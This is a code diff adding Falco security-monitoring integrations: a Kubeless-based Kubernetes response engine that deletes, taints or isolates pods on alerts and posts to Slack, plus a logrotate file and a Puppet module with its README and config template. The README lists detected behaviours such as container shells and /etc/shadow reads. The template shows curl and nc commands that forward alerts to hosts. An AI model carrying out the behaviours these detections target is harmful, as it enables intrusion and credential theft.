+-t topic        NATS topic to subscribe function. You can bind to multiple topics passing several -t parameters.
+
+You must pass the playbook and at least one topic to subscribe.
+
+Example:
+
+deploy_playbook -r slack -t "falco.error.*" -e SLACK_WEBHOOK_URL=http://foobar.com/...
+EOF
+  exit 1
+}
+
+function join { local IFS="$1"; shift; echo "$*"; }
+
+playbook=""
+environment=()
+topics=()
+
+while getopts "r:e:t:" arg; do
+  case $arg in
+    r)
+      playbook="${OPTARG}"
+      ;;
+    e)
+      environment+=("${OPTARG}")
+      ;;
+    t)
+      topics+=("${OPTARG}")
+      ;;
+    *)
+      usage
+      ;;
+  esac
+done
+
+if [[ "${playbook}" == "" || ${#topics[@]} -eq 0 ]]; then
+  usage
+fi
+
+pipenv lock --requirements | sed '/^-/ d' > requirements.txt
+
+zip "${playbook}".zip -r playbooks/*.py "${playbook}".py
+
+kubeless function deploy  --from-file "${playbook}".zip \
+                          --dependencies requirements.txt \
+                          --env "$(join , ${environment[*]})" \
+                          --runtime python3.6 \
+                          --handler "${playbook}".handler \
+                          falco-"${playbook}"
+
+rm requirements.txt ${playbook}.zip
+
+for index in ${!topics[*]}; do
+  kubeless trigger nats create falco-"${playbook}"-trigger-"${index}" \
+      --function-selector created-by=kubeless,function=falco-${playbook} \
+      --trigger-topic "${topics[$index]}"
+done
--- a/integrations/kubernetes-response-engine/playbooks/isolate.py
+++ b/integrations/kubernetes-response-engine/playbooks/isolate.py
@@ -0,0 +1,16 @@
+import sys
+import os.path
+sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__))))
+
+import os
+import playbooks
+from playbooks import infrastructure
+
+
+playbook = playbooks.NetworkIsolatePod(
+    infrastructure.KubernetesClient()
+)
+
+
+def handler(event, context):
+    playbook.run(event['data'])
--- a/integrations/kubernetes-response-engine/playbooks/playbooks/init.py
+++ b/integrations/kubernetes-response-engine/playbooks/playbooks/init.py
@@ -0,0 +1,101 @@
+import maya
+
+
+class DeletePod:
+    def __init__(self, k8s_client):
+        self._k8s_client = k8s_client
+
+    def run(self, alert):
+        pod_name = alert['output_fields']['k8s.pod.name']
+
+        self._k8s_client.delete_pod(pod_name)
+
+
+class AddMessageToSlack:
+    def __init__(self, slack_client):
+        self._slack_client = slack_client
+
+    def run(self, alert):
+        message = self._build_slack_message(alert)
+        self._slack_client.post_message(message)
+
+        return message
+
+    def _build_slack_message(self, alert):
+        return {
+            'text': self._output(alert),
+            'attachments':  [{
+                'color': self._color_from(alert['priority']),
+                'fields': [
+                    {
+                        'title': 'Rule',
+                        'value': alert['rule'],
+                        'short': False
+                    },
+                    {
+                        'title': 'Priority',
+                        'value': alert['priority'],
+                        'short': True
+                    },
+                    {
+                        'title': 'Time',
+                        'value': str(maya.parse(alert['time'])),
+                        'short': True
+                    },
+                    {
+                        'title': 'Kubernetes Pod Name',
+                        'value': alert['output_fields']['k8s.pod.name'],
+                        'short': True
+                    },
+                    {
+                        'title': 'Container Id',
+                        'value': alert['output_fields']['container.id'],
+                        'short': True
+                    }
+                ]
+            }]
+        }
+
+    def _output(self, alert):
+        output = alert['output'].split(': ')[1]
+        priority_plus_whitespace_length = len(alert['priority']) + 1
+
+        return output[priority_plus_whitespace_length:]
+
+    _COLORS = {
+        'Emergency': '#b12737',
+        'Alert': '#f24141',
+        'Critical': '#fc7335',
+        'Error': '#f28143',
+        'Warning': '#f9c414',
+        'Notice': '#397ec3',
+        'Informational': '#8fc0e7',
+        'Debug': '#8fc0e7',
+    }
+
+    def _color_from(self, priority):
+        return self._COLORS.get(priority, '#eeeeee')
+
+
+class TaintNode:
+    def __init__(self, k8s_client, key, value, effect):
+        self._k8s_client = k8s_client
+        self._key = key
+        self._value = value
+        self._effect = effect
+
+    def run(self, alert):
+        pod = alert['output_fields']['k8s.pod.name']
+        node = self._k8s_client.find_node_running_pod(pod)
+
+        self._k8s_client.taint_node(node, self._key, self._value, self._effect)
+
+
+class NetworkIsolatePod:
+    def __init__(self, k8s_client):
+        self._k8s_client = k8s_client
+
+    def run(self, alert):
+        pod = alert['output_fields']['k8s.pod.name']
+
+        self._k8s_client.add_label_to_pod(pod, 'isolated', 'true')
--- a/integrations/kubernetes-response-engine/playbooks/playbooks/infrastructure.py
+++ b/integrations/kubernetes-response-engine/playbooks/playbooks/infrastructure.py
@@ -0,0 +1,74 @@
+import os
+import json
+
+from kubernetes import client, config
+import requests
+
+
+class KubernetesClient:
+    def __init__(self):
+        if 'KUBERNETES_LOAD_KUBE_CONFIG' in os.environ:
+            config.load_kube_config()
+        else:
+            config.load_incluster_config()
+
+        self._v1 = client.CoreV1Api()
+
+    def delete_pod(self, name):
+        namespace = self._find_pod_namespace(name)
+        body = client.V1DeleteOptions()
+        self._v1.delete_namespaced_pod(name=name,
+                                       namespace=namespace,
+                                       body=body)
+
+    def exists_pod(self, name):
+        response = self._v1.list_pod_for_all_namespaces(watch=False)
+        for item in response.items:
+            if item.metadata.name == name:
+                if item.metadata.deletion_timestamp is None:
+                    return True
+
+        return False
+
+    def _find_pod_namespace(self, name):
+        response = self._v1.list_pod_for_all_namespaces(watch=False)
+        for item in response.items:
+            if item.metadata.name == name:
+                return item.metadata.namespace
+
+    def find_node_running_pod(self, name):
+        response = self._v1.list_pod_for_all_namespaces(watch=False)
+        for item in response.items:
+            if item.metadata.name == name:
+                return item.spec.node_name
+
+    def taint_node(self, name, key, value, effect):
+        body = client.V1Node(
+            spec=client.V1NodeSpec(
+                taints=[
+                    client.V1Taint(key=key, value=value, effect=effect)
+                ]
+            )
+        )
+
+        return self._v1.patch_node(name, body)
+
+    def add_label_to_pod(self, name, label, value):
+        namespace = self._find_pod_namespace(name)
+
+        body = client.V1Pod(
+            metadata=client.V1ObjectMeta(
+                labels={label: value}
+            )
+        )
+
+        return self._v1.patch_namespaced_pod(name, namespace, body)
+
+
+class SlackClient:
+    def __init__(self, slack_webhook_url):
+        self._slack_webhook_url = slack_webhook_url
+
+    def post_message(self, message):
+        requests.post(self._slack_webhook_url,
+                      data=json.dumps(message))
--- a/integrations/kubernetes-response-engine/playbooks/setup.py
+++ b/integrations/kubernetes-response-engine/playbooks/setup.py
@@ -0,0 +1,11 @@
+from setuptools import setup
+
+setup(name='playbooks',
+      version='0.1',
+      description='A set of playbooks for Falco alerts',
+      url='http://github.com/draios/falco-playbooks',
+      author='Néstor Salceda',
+      author_email='nestor.salceda@sysdig.com',
+      license='',
+      packages=['playbooks'],
+      zip_safe=False)
--- a/integrations/kubernetes-response-engine/playbooks/slack.py
+++ b/integrations/kubernetes-response-engine/playbooks/slack.py
@@ -0,0 +1,16 @@
+import sys
+import os.path
+sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__))))
+
+import os
+import playbooks
+from playbooks import infrastructure
+
+
+playbook = playbooks.AddMessageToSlack(
+    infrastructure.SlackClient(os.environ['SLACK_WEBHOOK_URL'])
+)
+
+
+def handler(event, context):
+    playbook.run(event['data'])
--- a/integrations/kubernetes-response-engine/playbooks/specs/infrastructure/kubernetes_client_spec.py
+++ b/integrations/kubernetes-response-engine/playbooks/specs/infrastructure/kubernetes_client_spec.py
@@ -0,0 +1,65 @@
+from mamba import description, context, it, before
+from expects import expect, be_false, be_true, start_with, equal, have_key
+
+import subprocess
+import os.path
+
+from playbooks import infrastructure
+
+
+with description(infrastructure.KubernetesClient) as self:
+    with before.each:
+        self.kubernetes_client = infrastructure.KubernetesClient()
+
+    with context('when checking if a pod exists'):
+        with before.each:
+            self._create_nginx_pod()
+
+        with context('and pod exists'):
+            with it('returns true'):
+                expect(self.kubernetes_client.exists_pod('nginx')).to(be_true)
+
+        with context('and pod does not exist'):
+            with it('returns false'):
+                self.kubernetes_client.delete_pod('nginx')
+
+                expect(self.kubernetes_client.exists_pod('nginx')).to(be_false)
+
+    with it('finds node running pod'):
+        self._create_nginx_pod()
+
+        node = self.kubernetes_client.find_node_running_pod('nginx')
+
+        expect(node).to(start_with('gke-sysdig-work-default-pool'))
+
+    with it('taints node'):
+        self._create_nginx_pod()
+
+        node_name = self.kubernetes_client.find_node_running_pod('nginx')
+
+        node = self.kubernetes_client.taint_node(node_name,
+                                                 'playbooks',
+                                                 'true',
+                                                 'NoSchedule')
+
+        expect(node.spec.taints[0].effect).to(equal('NoSchedule'))
+        expect(node.spec.taints[0].key).to(equal('playbooks'))
+        expect(node.spec.taints[0].value).to(equal('true'))
+
+    with it('adds labels to a pod'):
+        self._create_nginx_pod()
+
+        pod = self.kubernetes_client.add_label_to_pod('nginx',
+                                                      'testing',
+                                                      'true')
+
+        expect(pod.metadata.labels).to(have_key('testing', 'true'))
+
+    def _create_nginx_pod(self):
+        current_directory = os.path.dirname(os.path.realpath(__file__))
+        pod_manifesto = os.path.join(current_directory,
+                                     '..',
+                                     'support',
+                                     'deployment.yaml')
+
+        subprocess.run(['kubectl', 'create', '-f', pod_manifesto])
--- a/integrations/kubernetes-response-engine/playbooks/specs/infrastructure/slack_client_spec.py
+++ b/integrations/kubernetes-response-engine/playbooks/specs/infrastructure/slack_client_spec.py
@@ -0,0 +1,16 @@
+from mamba import description, it
+
+import os
+
+from playbooks import infrastructure
+
+
+with description(infrastructure.SlackClient) as self:
+    with it('posts a message to #kubeless-demo channel'):
+        slack_client = infrastructure.SlackClient(os.environ['SLACK_WEBHOOK_URL'])
+
+        message = {
+            'text': 'Hello from Python! :metal:'
+        }
+
+        slack_client.post_message(message)
--- a/integrations/kubernetes-response-engine/playbooks/specs/playbooks/add_message_to_slack_playbook_spec.py
+++ b/integrations/kubernetes-response-engine/playbooks/specs/playbooks/add_message_to_slack_playbook_spec.py
@@ -0,0 +1,62 @@
+from mamba import description, it, before, context
+from expects import expect, have_key, have_keys, contain
+
+from doublex import Spy
+from doublex_expects import have_been_called_with
+
+from playbooks import infrastructure
+import playbooks
+
+
+
+with description(playbooks.AddMessageToSlack) as self:
+    with before.each:
+        self.slack_client = Spy(infrastructure.SlackClient)
+        self.playbook = playbooks.AddMessageToSlack(self.slack_client)
+
+    with context('when publishing a message to slack'):
+        with before.each:
+            self.alert = {
+                "output": "10:22:15.576767292: Notice Unexpected setuid call by non-sudo, non-root program (user=bin cur_uid=2 parent=event_generator command=event_generator  uid=root) k8s.pod=falco-event-generator-6fd89678f9-cdkvz container=1c76f49f40b4",
+                "output_fields": {
+                    "container.id": "1c76f49f40b4",
+                    "evt.arg.uid": "root",
+                    "evt.time": 1527157335576767292,
+                    "k8s.pod.name": "falco-event-generator-6fd89678f9-cdkvz",
+                    "proc.cmdline": "event_generator ",
+                    "proc.pname": "event_generator",
+                    "user.name": "bin",
+                    "user.uid": 2
+                },
+                "priority": "Notice",
+                "rule": "Non sudo setuid",
+                "time": "2018-05-24T10:22:15.576767292Z"
+            }
+
+            self.message = self.playbook.run(self.alert)
+
+        with it('publishes message to slack'):
+            expect(self.slack_client.post_message).to(have_been_called_with(self.message))
+
+        with it('includes falco output'):
+            falco_output = 'Unexpected setuid call by non-sudo, non-root program (user=bin cur_uid=2 parent=event_generator command=event_generator  uid=root) k8s.pod=falco-event-generator-6fd89678f9-cdkvz container=1c76f49f40b4'
+
+            expect(self.message).to(have_key('text', falco_output))
+
+        with it('includes color based on priority'):
+            expect(self.message['attachments'][0]).to(have_key('color'))
+
+        with it('includes priority'):
+            expect(self.message['attachments'][0]['fields']).to(contain(have_keys(title='Priority', value='Notice')))
+
+        with it('includes rule name'):
+            expect(self.message['attachments'][0]['fields']).to(contain(have_keys(title='Rule', value='Non sudo setuid')))
+
+        with it('includes time when alert happened'):
+            expect(self.message['attachments'][0]['fields']).to(contain(have_keys(title='Time', value='Thu, 24 May 2018 10:22:15 GMT')))
+
+        with it('includes kubernetes pod name'):
+            expect(self.message['attachments'][0]['fields']).to(contain(have_keys(title='Kubernetes Pod Name', value='falco-event-generator-6fd89678f9-cdkvz')))
+
+        with it('includes container id'):
+            expect(self.message['attachments'][0]['fields']).to(contain(have_keys(title='Container Id', value='1c76f49f40b4')))
--- a/integrations/kubernetes-response-engine/playbooks/specs/playbooks/delete_pod_playbook_spec.py
+++ b/integrations/kubernetes-response-engine/playbooks/specs/playbooks/delete_pod_playbook_spec.py
@@ -0,0 +1,22 @@
+from mamba import description, it, before
+from expects import expect
+
+from doublex import Spy
+from doublex_expects import have_been_called_with
+
+from playbooks import infrastructure
+import playbooks
+
+
+with description(playbooks.DeletePod) as self:
+    with before.each:
+        self.k8s_client = Spy(infrastructure.KubernetesClient)
+        self.playbook = playbooks.DeletePod(self.k8s_client)
+
+    with it('deletes a pod'):
+        pod_name = 'a pod name'
+        alert = {'output_fields': {'k8s.pod.name': pod_name}}
+
+        self.playbook.run(alert)
+
+        expect(self.k8s_client.delete_pod).to(have_been_called_with(pod_name))
--- a/integrations/kubernetes-response-engine/playbooks/specs/playbooks/network_isolate_pod_playbook_spec.py
+++ b/integrations/kubernetes-response-engine/playbooks/specs/playbooks/network_isolate_pod_playbook_spec.py
@@ -0,0 +1,22 @@
+from mamba import description, it, before
+from expects import expect
+
+from doublex import Spy
+from doublex_expects import have_been_called
+
+from playbooks import infrastructure
+import playbooks
+
+
+with description(playbooks.NetworkIsolatePod) as self:
+    with before.each:
+        self.k8s_client = Spy(infrastructure.KubernetesClient)
+        self.playbook = playbooks.NetworkIsolatePod(self.k8s_client)
+
+    with it('adds isolation label to pod'):
+        pod_name = 'any pod name'
+        alert = {'output_fields': {'k8s.pod.name': pod_name}}
+
+        self.playbook.run(alert)
+
+        expect(self.k8s_client.add_label_to_pod).to(have_been_called)
--- a/integrations/kubernetes-response-engine/playbooks/specs/playbooks/taint_node_playbook_spec.py
+++ b/integrations/kubernetes-response-engine/playbooks/specs/playbooks/taint_node_playbook_spec.py
@@ -0,0 +1,34 @@
+from mamba import description, it, before
+from expects import expect
+
+from doublex import Spy, when
+from doublex_expects import have_been_called_with
+
+from playbooks import infrastructure
+import playbooks
+
+
+with description(playbooks.TaintNode) as self:
+    with before.each:
+        self.k8s_client = Spy(infrastructure.KubernetesClient)
+        self.key = 'falco/alert'
+        self.value = 'true'
+        self.effect = 'NoSchedule'
+        self.playbook = playbooks.TaintNode(self.k8s_client,
+                                            self.key,
+                                            self.value,
+                                            self.effect)
+
+    with it('taints the node'):
+        pod_name = 'any pod name'
+        alert = {'output_fields': {'k8s.pod.name': pod_name}}
+
+        node = 'any node'
+        when(self.k8s_client).find_node_running_pod(pod_name).returns(node)
+
+        self.playbook.run(alert)
+
+        expect(self.k8s_client.taint_node).to(have_been_called_with(node,
+                                                                    self.key,
+                                                                    self.value,
+                                                                    self.effect))
--- a/integrations/kubernetes-response-engine/playbooks/specs/support/deployment.yaml
+++ b/integrations/kubernetes-response-engine/playbooks/specs/support/deployment.yaml
@@ -0,0 +1,10 @@
+apiVersion: v1
+kind: Pod
+metadata:
+  name: nginx
+spec:
+  containers:
+  - name: nginx
+    image: nginx:latest
+    ports:
+    - containerPort: 80
--- a/integrations/kubernetes-response-engine/playbooks/taint.py
+++ b/integrations/kubernetes-response-engine/playbooks/taint.py
@@ -0,0 +1,19 @@
+import sys
+import os.path
+sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__))))
+
+import os
+import playbooks
+from playbooks import infrastructure
+
+
+playbook = playbooks.TaintNode(
+    infrastructure.KubernetesClient(),
+    os.environ.get('TAINT_KEY', 'falco/alert'),
+    os.environ.get('TAINT_VALUE', 'true'),
+    os.environ.get('TAINT_EFFECT', 'NoSchedule')
+)
+
+
+def handler(event, context):
+    playbook.run(event['data'])
--- a/integrations/logrotate/falco
+++ b/integrations/logrotate/falco
@@ -0,0 +1,7 @@
+/var/log/falco-events.log {
+    rotate 5
+    size 1M
+    postrotate
+        /usr/bin/killall -USR1 falco
+    endscript
+}
--- a/integrations/puppet-module/README.md
+++ b/integrations/puppet-module/README.md
@@ -0,0 +1,3 @@
+# Example Puppet Falco Module
+
+This contains an example [Puppet](https://puppet.com/) module for Falco.
--- a/integrations/puppet-module/sysdig-falco/Gemfile
+++ b/integrations/puppet-module/sysdig-falco/Gemfile
@@ -0,0 +1,7 @@
+source 'https://rubygems.org'
+
+puppetversion = ENV.key?('PUPPET_VERSION') ? "= #{ENV['PUPPET_VERSION']}" : ['>= 3.3']
+gem 'puppet', puppetversion
+gem 'puppetlabs_spec_helper', '>= 0.1.0'
+gem 'puppet-lint', '>= 0.3.2'
+gem 'facter', '>= 1.7.0'
--- a/integrations/puppet-module/sysdig-falco/README.md
+++ b/integrations/puppet-module/sysdig-falco/README.md
@@ -0,0 +1,241 @@
+# falco
+
+#### Table of Contents
+
+1. [Overview](#overview)
+2. [Module Description - What the module does and why it is useful](#module-description)
+3. [Setup - The basics of getting started with falco](#setup)
+    * [What falco affects](#what-falco-affects)
+    * [Beginning with falco](#beginning-with-falco)
+4. [Usage - Configuration options and additional functionality](#usage)
+5. [Reference - An under-the-hood peek at what the module is doing and how](#reference)
+5. [Limitations - OS compatibility, etc.](#limitations)
+6. [Development - Guide for contributing to the module](#development)
+
+## Overview
+
+Sysdig Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Powered by sysdig’s system call capture infrastructure, falco lets you continuously monitor and detect container, application, host, and network activity... all in one place, from one source of data, with one set of rules.
+
+#### What kind of behaviors can Falco detect?
+
+Falco can detect and alert on any behavior that involves making Linux system calls. Thanks to Sysdig's core decoding and state tracking functionality, falco alerts can be triggered by the use of specific system calls, their arguments, and by properties of the calling process. For example, you can easily detect things like:
+
+- A shell is run inside a container
+- A container is running in privileged mode, or is mounting a sensitive path like `/proc` from the host.
+- A server process spawns a child process of an unexpected type
+- Unexpected read of a sensitive file (like `/etc/shadow`)
+- A non-device file is written to `/dev`
+- A standard system binary (like `ls`) makes an outbound network connection
+
+## Module Description
+
+This module configures falco as a systemd service. You configure falco
+to send its notifications to one or more output channels (syslog,
+files, programs).
+
+## Setup
+
+### What falco affects
+
+This module affects the following:
+
+* The main falco configuration file `/etc/falco/falco.yaml`, including
+** Output format (JSON vs plain text)
+** Log level
+** Rule priority level to run
+** Output buffering
+** Output throttling
+** Output channels (syslog, file, program)
+
+### Beginning with falco
+
+To have Puppet install falco with the default parameters, declare the falco class:
+
+``` puppet
+class { 'falco': }
+```
+
+When you declare this class with the default options, the module:
+
+* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system.
+* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled.
+* Starts the falco service.
+
+## Usage
+
+### Enabling file output
+
+To enable file output, set the `file_output` hash, as follows:
+
+``` puppet
+class { 'falco':
+  file_output => {
+    'enabled' => 'true',
+    'keep_alive' => 'false',
+	'filename' => '/tmp/falco-events.txt'
+  },
+}
+```
+
+### Enabling program output
+
+To enable program output, set the `program_output` hash and optionally the `json_output` parameters, as follows:
+
+``` puppet
+class { 'falco':
+  json_output => 'true',
+  program_output => {
+    'enabled' => 'true',
+    'keep_alive' => 'false',
+	'program' => 'curl http://some-webhook.com'
+  },
+}
+```
+
+## Reference
+
+* [**Public classes**](#public-classes)
+    * [Class: falco](#class-falco)
+
+### Public Classes
+
+#### Class: `falco`
+
+Guides the basic setup and installation of falco on your system.
+
+When this class is declared with the default options, Puppet:
+
+* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system.
+* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled.
+* Starts the falco service.
+
+You can simply declare the default `falco` class:
+
+``` puppet
+class { 'falco': }
+```
+
+###### `rules_file`
+
+An array of files for falco to load. Order matters--the first file listed will be loaded first.
+
+Default: `['/etc/falco/falco_rules.yaml', '/etc/falco/falco_rules.local.yaml']`
+
+##### `json_output`
+
+Whether to output events in json or text.
+
+Default: `false`
+
+##### `log_stderr`
+
+Send falco's logs to stderr. Note: this is not notifications, this is
+logs from the falco daemon itself.
+
+Default: `false`
+
+##### `log_syslog`
+
+Send falco's logs to syslog. Note: this is not notifications, this is
+logs from the falco daemon itself.
+
+Default: `true`
+
+##### `log_level`
+
+Minimum log level to include in logs. Note: these levels are
+separate from the priority field of rules. This refers only to the
+log level of falco's internal logging. Can be one of "emergency",
+"alert", "critical", "error", "warning", "notice", "info", "debug".
+
+Default: `info`
+
+##### `priority`
+
+Minimum rule priority level to load and run. All rules having a
+priority more severe than this level will be loaded/run.  Can be one
+of "emergency", "alert", "critical", "error", "warning", "notice",
+"info", "debug".
+
+Default: `debug`
+
+##### `buffered_outputs`
+
+Whether or not output to any of the output channels below is
+buffered.
+
+Default: `true`
+
+##### `outputs_rate`/`outputs_max_burst`
+
+A throttling mechanism implemented as a token bucket limits the
+rate of falco notifications. This throttling is controlled by the following configuration
+options:
+
+* `outputs_rate`: the number of tokens (i.e. right to send a notification)
+   gained per second. Defaults to 1.
+* `outputs_max_burst`: the maximum number of tokens outstanding. Defaults to 1000.
+
+##### `syslog_output
+
+Controls syslog output for notifications. Value: a hash, containing the following:
+
+* `enabled`: `true` or `false`. Default: `true`.
+
+Example:
+
+``` puppet
+class { 'falco':
+  syslog_output => {
+    'enabled' => 'true',
+  },
+}
+```
+
+##### `file_output`
+
+Controls file output for notifications. Value: a hash, containing the following:
+
+* `enabled`: `true` or `false`. Default: `false`.
+* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`.
+* `filename`: Notifications will be written to this file.
+
+Example:
+
+``` puppet
+class { 'falco':
+  file_output => {
+    'enabled' => 'true',
+    'keep_alive' => 'false',
+	'filename' => '/tmp/falco-events.txt'
+  },
+}
+```
+
+##### `program_output
+
+Controls program output for notifications. Value: a hash, containing the following:
+
+* `enabled`: `true` or `false`. Default: `false`.
+* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`.
+* `program`: Notifications will be written to this program.
+
+Example:
+
+``` puppet
+class { 'falco':
+  program_output => {
+    'enabled' => 'true',
+    'keep_alive' => 'false',
+	'program' => 'curl http://some-webhook.com'
+  },
+}
+```
+
+## Limitations
+
+The module works where falco works as a daemonized service (generally, Linux only).
+
+## Development
+
+For more information on Sysdig Falco, visit our [github](https://github.com/draios/falco) or [web site](https://sysdig.com/opensource/falco/).
--- a/integrations/puppet-module/sysdig-falco/Rakefile
+++ b/integrations/puppet-module/sysdig-falco/Rakefile
@@ -0,0 +1,18 @@
+require 'rubygems'
+require 'puppetlabs_spec_helper/rake_tasks'
+require 'puppet-lint/tasks/puppet-lint'
+PuppetLint.configuration.send('disable_80chars')
+PuppetLint.configuration.ignore_paths = ["spec/**/*.pp", "pkg/**/*.pp"]
+
+desc "Validate manifests, templates, and ruby files"
+task :validate do
+  Dir['manifests/**/*.pp'].each do |manifest|
+    sh "puppet parser validate --noop #{manifest}"
+  end
+  Dir['spec/**/*.rb','lib/**/*.rb'].each do |ruby_file|
+    sh "ruby -c #{ruby_file}" unless ruby_file =~ /spec\/fixtures/
+  end
+  Dir['templates/**/*.erb'].each do |template|
+    sh "erb -P -x -T '-' #{template} | ruby -c"
+  end
+end
--- a/integrations/puppet-module/sysdig-falco/manifests/config.pp
+++ b/integrations/puppet-module/sysdig-falco/manifests/config.pp
@@ -0,0 +1,13 @@
+# == Class: falco::config
+class falco::config inherits falco {
+
+  file { '/etc/falco/falco.yaml':
+    notify  => Service['falco'],
+    ensure  => file,
+    owner   => 'root',
+    group   => 'root',
+    mode    => '0644',
+    content => template('falco/falco.yaml.erb'),
+  }
+
+}
--- a/integrations/puppet-module/sysdig-falco/manifests/init.pp
+++ b/integrations/puppet-module/sysdig-falco/manifests/init.pp
@@ -0,0 +1,31 @@
+class falco (
+          $rules_file = [
+              '/etc/falco/falco_rules.yaml',
+              '/etc/falco/falco_rules.local.yaml'
+          ],
+          $json_output = 'false',
+          $log_stderr = 'false',
+          $log_syslog = 'true',
+          $log_level = 'info',
+          $priority = 'debug',
+          $buffered_outputs = 'true',
+          $outputs_rate = 1,
+          $outputs_max_burst = 1000,
+          $syslog_output = {
+              'enabled' => 'true'
+          },
+          $file_output = {
+              'enabled' => 'false',
+              'keep_alive' => 'false',
+              'filename' => '/tmp/falco_events.txt'
+          },
+          $program_output = {
+              'enabled' => 'false',
+              'keep_alive' => 'false',
+              'program' => 'curl http://some-webhook.com'
+          },
+      ) {
+  include falco::install
+  include falco::config
+  include falco::service
+}
--- a/integrations/puppet-module/sysdig-falco/manifests/install.pp
+++ b/integrations/puppet-module/sysdig-falco/manifests/install.pp
@@ -0,0 +1,6 @@
+# == Class: falco::install
+class falco::install inherits falco {
+  package { 'falco':
+      ensure => installed,
+  }
+}
--- a/integrations/puppet-module/sysdig-falco/manifests/service.pp
+++ b/integrations/puppet-module/sysdig-falco/manifests/service.pp
@@ -0,0 +1,11 @@
+# == Class: falco::service
+class falco::service inherits falco {
+
+  service { 'falco':
+    ensure     => running,
+    enable     => true,
+    hasstatus  => true,
+    hasrestart => true,
+    require => Package['falco'],
+  }
+}
--- a/integrations/puppet-module/sysdig-falco/metadata.json
+++ b/integrations/puppet-module/sysdig-falco/metadata.json
@@ -0,0 +1,14 @@
+{
+  "name": "sysdig-falco",
+  "version": "0.1.0",
+  "author": "sysdig",
+  "summary": "Sysdig Falco: Behavioral Activity Monitoring With Container Support",
+  "license": "GPLv2",
+  "source": "https://github.com/draios/falco",
+  "project_page": "https://github.com/draios/falco",
+  "issues_url": "https://github.com/draios/falco/issues",
+  "dependencies": [
+    {"name":"puppetlabs-stdlib","version_requirement":">= 1.0.0"}
+  ]
+}
+
--- a/integrations/puppet-module/sysdig-falco/spec/classes/init_spec.rb
+++ b/integrations/puppet-module/sysdig-falco/spec/classes/init_spec.rb
@@ -0,0 +1,7 @@
+require 'spec_helper'
+describe 'falco' do
+
+  context 'with defaults for all parameters' do
+    it { should contain_class('falco') }
+  end
+end
--- a/integrations/puppet-module/sysdig-falco/spec/spec_helper.rb
+++ b/integrations/puppet-module/sysdig-falco/spec/spec_helper.rb
@@ -0,0 +1 @@
+require 'puppetlabs_spec_helper/module_spec_helper'
--- a/integrations/puppet-module/sysdig-falco/templates/falco.yaml.erb
+++ b/integrations/puppet-module/sysdig-falco/templates/falco.yaml.erb
@@ -0,0 +1,96 @@
+####
+# THIS FILE MANAGED BY PUPPET. DO NOT MODIFY
+####
+
+# File(s) containing Falco rules, loaded at startup.
+#
+# falco_rules.yaml ships with the falco package and is overridden with
+# every new software version. falco_rules.local.yaml is only created
+# if it doesn't exist. If you want to customize the set of rules, add
+# your customizations to falco_rules.local.yaml.
+#
+# The files will be read in the order presented here, so make sure if
+# you have overrides they appear in later files.
+rules_file:
+<% Array(@rules_file).each do |file| -%>
+ - <%= file %>
+<% end -%>
+
+# Whether to output events in json or text
+json_output: <%= @json_output %>
+
+# Send information logs to stderr and/or syslog Note these are *not* security
+# notification logs! These are just Falco lifecycle (and possibly error) logs.
+log_stderr: <%= @log_stderr %>
+log_syslog: <%= @log_syslog %>
+
+# Minimum log level to include in logs. Note: these levels are
+# separate from the priority field of rules. This refers only to the
+# log level of falco's internal logging. Can be one of "emergency",
+# "alert", "critical", "error", "warning", "notice", "info", "debug".
+log_level: <%= @log_level %>
+
+# Minimum rule priority level to load and run. All rules having a
+# priority more severe than this level will be loaded/run.  Can be one
+# of "emergency", "alert", "critical", "error", "warning", "notice",
+# "info", "debug".
+priority: <%= @priority %>
+
+# Whether or not output to any of the output channels below is
+# buffered. Defaults to true
+buffered_outputs: <%= @buffered_outputs %>
+
+# A throttling mechanism implemented as a token bucket limits the
+# rate of falco notifications. This throttling is controlled by the following configuration
+# options:
+#  - rate: the number of tokens (i.e. right to send a notification)
+#    gained per second. Defaults to 1.
+#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.
+#
+# With these defaults, falco could send up to 1000 notifications after
+# an initial quiet period, and then up to 1 notification per second
+# afterward. It would gain the full burst back after 1000 seconds of
+# no activity.
+
+outputs:
+  rate: <%= @outputs_rate %>
+  max_burst: <%= @outputs_max_burst %>
+
+# Where security notifications should go.
+# Multiple outputs can be enabled.
+<% unless @syslog_output.nil? -%>
+syslog_output:
+  enabled: <%= @syslog_output['enabled'] %>
+<% end -%>
+
+# If keep_alive is set to true, the file will be opened once and
+# continuously written to, with each output message on its own
+# line. If keep_alive is set to false, the file will be re-opened
+# for each output message.
+<% unless @file_output.nil? -%>
+file_output:
+  enabled: <%= @file_output['enabled'] %>
+  keep_alive: <%= @file_output['keep_alive'] %>
+  filename: <%= @file_output['filename'] %>
+<% end -%>
+
+# Possible additional things you might want to do with program output:
+#   - send to a slack webhook:
+#         program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
+#   - logging (alternate method than syslog):
+#         program: logger -t falco-test
+#   - send over a network connection:
+#         program: nc host.example.com 80
+
+# If keep_alive is set to true, the program will be started once and
+# continuously written to, with each output message on its own
+# line. If keep_alive is set to false, the program will be re-spawned
+# for each output message.
+
+<% unless @program_output.nil? -%>
+program_output:
+  enabled: <%= @program_output['enabled'] %>
+  keep_alive: <%= @program_output['keep_alive'] %>
+  program: <%= @program_output['program'] %>
+<% end -%>
+
--- a/integrations/puppet-module/sysdig-falco/tests/init.pp
+++ b/integrations/puppet-module/sysdig-falco/tests/init.pp
@@ -0,0 +1,12 @@
+# The baseline for module testing used by Puppet Labs is that each manifest
+# should have a corresponding test manifest that declares that class or defined
+# type.
+#
+# Tests are then run by using puppet apply --noop (to check for compilation
+# errors and view a log of events) or by fully applying the test in a virtual
+# environment (to compare the resulting system state to the desired state).
+#
+# Learn more about module testing here:
+# http://docs.puppetlabs.com/guides/tests_smoke.html
+#
+include falco
--- a/rules/CMakeLists.txt
+++ b/rules/CMakeLists.txt
@@ -1,9 +1,11 @@
 if(NOT DEFINED FALCO_ETC_DIR)
